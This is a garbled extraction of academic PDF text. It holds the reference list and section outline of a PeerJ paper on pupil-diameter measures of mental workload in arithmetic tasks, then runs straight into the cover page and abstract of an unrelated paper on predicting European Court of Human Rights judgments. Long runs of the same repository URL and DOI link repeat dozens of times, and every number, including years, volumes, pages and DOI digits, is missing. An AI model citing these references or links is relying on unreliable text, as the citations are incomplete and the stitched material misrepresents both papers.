/supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references ahern sk. . activation and intelligence: pupillometric correlates of individual differences in cognitive abilities. doctoral diss., university of california. beatty j. . task-evoked pupillary responses, processing load, and the structure of processing resources. psychological bulletin : – doi . / - . . . . beatty j, lucero-wagoner b. . the pupillary system. in: cacioppo j, tassinary lg, berntson gg, eds. the handbook of psychophysiology. cambridge: cambridge university press, – . beatty j, wilson co. . activation and sustained attention: a pupillometric study of an auditory vigilance task. technical report . los angeles: university of california. boersma f, wilton k, barham r, muir w. . effects of arithmetic problem difficulty on pupillary dilation in normals and educable retardates. journal of experimental child psychology : – doi . / - ( ) - . bradshaw jl. . pupil size and problem solving. quarterly journal of experimental psychology : – doi . / . byrne ea, parasuraman r. . psychophysiology and adaptive automation. biological psychology : – doi . / - ( ) - . goldinger sd, papesh mh. . pupil dilation reflects the creation and retrieval of memories. psychological science : – doi . / . granholm e, steinhauer sr. . pupillometric measures of cognitive and emotional processes. international journal of psychophysiology : – doi . /j.ijpsycho. . . . haapalainen e, kim s, forlizzi jf, dey ak. . psycho-physiological measures for assessing cognitive load. in: proceedings of the th acm international conference on ubiquitous computing, – . hart sg, staveland le. . development of nasa-tlx (task load index): results of empirical and theoretical research. in: hancock pa, meshkati n, eds. human mental workload. amsterdam: north holland press, – . hess eh, polt jm. . pupil sizes in relation to mental activity during simple problem-solving. science : – doi . /science. . . . janisse mp. . pupillometry: the psychology of the pupillary response. washington, dc: hemisphere. just ma, carpenter pa, miyake a. . neuroindices of cognitive workload: neuroimaging pupillometric and event-related potential studies of brain work. theoretical issues in ergonomics science : – doi . / . kahneman d, beatty j. . pupil diameter and load on memory. science : – doi . /science. . . . kahneman d, tursky b, shapiro d, crider a. . pupillary, heart rate, and skin resistance changes during a mental task. journal of experiment psychology : – doi . /h . klingner j. . measuring cognitive load during visual tasks by combining pupillometry and eye tracking. doctoral diss., stanford university. marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / http://dx.doi.org/ . /j.ijpsycho. . . http://dx.doi.org/ . /science. . . http://dx.doi.org/ . / http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /h http://dx.doi.org/ . /peerj-cs. klingner j, kumar r, hanrahan p. . measuring the task-evoked pupillary response with a remote eye tracker. in: proceedings of the symposium on eye tracking research & applications, – . kramer af. . physiological metrics of mental workload: a review of recent progress. in: damos dl, ed. multiple-task performance. london: taylor & francis, – . laeng b, sirois s, gredebäck g. . pupillometry: a window to the preconscious? perspectives on psychological science : – doi . / . marquart g. . pupil light reflex suppression by variable screen brightness. available at http:// repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis report gerhard marquart.pdf. marquart g, cabrall c, de winter jcf. . review of eye-related measures of drivers’ mental workload. in: proceedings of the th international conference on applied human factors and ergonomics. las vegas doi . /j.promfg. . . . marshall sp. . method and apparatus for eye tracking and monitoring pupil dilation to evaluate cognitive activity. us patent no. , , . marshall sp. . identifying cognitive state from eye metrics. aviation, space, and environmental medicine :b –b . palinko o, kun a, shyrokov a, heeman p. . estimating cognitive load using remote eye tracking in a driving simulator. in: proceedings of the symposium on eye-tracking research & applications, – . palinko o, kun a. . exploring the influence of light and cognitive load on pupil diameter in driving simulators. in: proceedings of the sixth international driving symposium on human factors in driver assessment, training and vehicle design, – . payne dt, parry me, harasymiw sj. . percentage of pupillary dilation as a measure of item difficulty. perception & psychophysics : – doi . /bf . pomplun m, sunkara s. . pupil dilation as an indicator of cognitive workload in human–computer interaction. in: proceedings of the tenth international conference on human–computer interaction, vol. . – . recarte ma, pérez e, conchillo a, nunes lm. . mental workload and visual impairment: differences between pupil, blink, and subjective rating. the spanish journal of psychology : – . satterthwaite td, green l, myerson j, parker j, ramaratnam m, buckner rl. . dissociable but inter-related systems of cognitive control and reward during decision making: evidence from pupillometry and event-related fmri. neuroimage : – doi . /j.neuroimage. . . . schaefer jr t, brinton ferguson j, klein ja, rawson eb. . pupillary responses during mental activities. psychonomic science : – doi . /bf . schwalm m, keinath a, zimmer hd. . pupillometry as a method for measuring mental workload within a simulated driving task. in: de waard d, flemisch f, lorenz b, oberheid h, brookhuis k, eds. human factors for assistance and automation. maastricht: shaker publishing, – . smart eye ab. . programmer’s guide, revision . . gothenburg, sweden. tryon ww. . pupillometry: a survey of sources of variation. psychophysiology : – doi . /j. - . .tb .x. marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . / http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://dx.doi.org/ . /j.promfg. . . http://dx.doi.org/ . /bf http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /bf http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /peerj-cs. van der meer e, beyer r, horn j, foth m, bornemann b, ries j, kramer j, warmuth e, heekeren hr, wartenburger i. . resource allocation and fluid intelligence: insights from pupillometry. psychophysiology : – doi . /j. - . . .x. van der molen mw, boomsma di, jennings jr, nieuwboer rt. . does the heart know what the eye sees? a cardiac/pupillometric analysis of motor preparation and response execution. psychophysiology : – doi . /j. - . .tb .x. marquart and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /peerj-cs. workload assessment for mental arithmetic tasks using the task-evoked pupillary response introduction method ethics statement participants equipment procedure instructions to participants data processing statistical analyses results mean pupil diameter (mpd) mean pupil diameter change (mpdc) mean pupil diameter change rate (mpdcr) self-reported workload (nasa-tlx) pupil diameter of correct versus incorrect responses blink rate correlations between mpdc, nasa-tlx, and proportion of incorrect responses discussion pupil diameter results self-reported workload (nasa-tlx) blink rate correlations between mpdc, nasa-tlx, and proportion of incorrect responses conclusions and recommendations references predicting judicial decisions of the european court of human rights: a natural language processing perspective this is a repository copy of predicting judicial decisions of the european court of human rights: a natural language processing perspective. white rose research online url for this paper: http://eprints.whiterose.ac.uk/ / version: published version article: tsarapatsanis, dimitrios orcid.org/ - - - , aletras, nikolaos, preotiuc- pietro, daniel et al. ( more author) ( ) predicting judicial decisions of the european court of human rights: a natural language processing perspective. peerj computer science. issn - https://doi.org/ . /peerj-cs. eprints@whiterose.ac.uk https://eprints.whiterose.ac.uk/ reuse this article is distributed under the terms of the creative commons attribution (cc by) licence. this licence allows you to distribute, remix, tweak, and build upon the work, even commercially, as long as you credit the authors for the original work. more information and the full terms of the licence here: https://creativecommons.org/licenses/ takedown if you consider content in white rose research online to be in breach of uk law, please notify us by emailing eprints@whiterose.ac.uk including the url of the record and the reason for the withdrawal request. submitted may accepted september published october corresponding author nikolaos aletras, nikos.aletras@gmail.com academic editor lexing xie additional information and declarations can be found on page doi . /peerj-cs. copyright aletras etal distributed under creative commons cc-by . open access predicting judicial decisions of the european court of human rights: a natural language processing perspective nikolaos aletras , , dimitrios tsarapatsanis , daniel preoţiuc-pietro , and vasileios lampos amazon.com, cambridge, united kingdom department of computer science, university college london, university of london, london, united kingdom school of law, university of sheffield, sheffield, united kingdom positive psychology center, university of pennsylvania, philadelphia, united states computer & information science, university of pennsylvania, philadelphia, united states abstract recent advances in natural language processing and machine learning provide us with the tools to build predictive models that can be used to unveil patterns driving judicial decisions. this can be useful, for both lawyers and judges, as an assisting tool to rapidly identify cases and extract 